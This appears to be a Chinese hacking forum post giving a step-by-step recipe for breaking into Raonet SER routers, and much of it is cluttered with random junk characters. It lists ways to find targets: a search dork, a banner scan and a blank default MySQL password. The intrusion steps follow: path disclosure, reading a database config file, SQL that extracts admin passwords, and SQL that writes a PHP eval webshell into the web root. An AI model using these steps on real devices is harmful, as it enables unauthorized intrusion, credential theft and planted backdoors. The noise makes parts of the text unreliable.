寻找存在漏洞的路由器方法:7 X! p* f) s3 [5 ]2 x* _1 N# ^
- S5 h3 }4 m( o
1:google搜索'Raonet Subscriber Ethernet Router'8 B' J3 ?$ a; u3 z8 d8 m: I
/ ]: T# M& i. ^2 B. V2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001* Z/ k9 @6 V* b; y, P$ n0 b% o" h6 Z
5 }7 g- M3 R& K, W# V3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。6 K3 R/ |6 Y: ]+ y: k' A
0 P4 J3 O4 g, Y+ Z3 Q( f! L8 V
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
P3 | V) U! _7 w# F" O1 D
. N, Z2 t4 {* w, n' t
7 f* b+ Y. u4 Y1 f" T& n) [+ Q" L4 w$ z4 d8 y& R# m' e6 B0 W9 \5 P
入侵步骤:$ |" `/ E, f) J4 @
( G, U- J! Z9 w- f& N- a6 r1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
, M2 A/ q" c% F& ]1 g6 h! V, x3 g7 I% f
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc b# W- r3 _ M0 _6 V/ A
3:得到密码后连接,查看GUI管理密码:5 z' D! C j4 e3 v0 M" v
use ser_500* W* f& E% {8 S: u) I6 P
select id,passwd from user;
5 e* J2 i' F S* j0 A5 d" f& s8 U4:通过数据库写入webshell,执行命令:
' Y8 ~2 ?/ d. f. a9 D( F; euse mysql;
& W/ L( T0 Y& |$ f4 ^* n0 lcreate table ok(cmd TEXT);
3 K5 [7 G2 _% x! r1 yinsert into ok values("<?php @eval($_POST[cmd])?>");
4 i+ q* C( {! _* _select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
9 V. T. w" m% k3 `9 _' gdrop table ok;/ X. B- P1 Q" h0 b& J
" p A7 y' L6 ]; I7 a
5:连接后门shell.php , ~+ M) c- k2 }
' l& d* i# F4 g9 b0 j6. 搞定!
6 m) @2 U3 l. a; H) D% X( j, T4 ]" \! Y. Y, [
|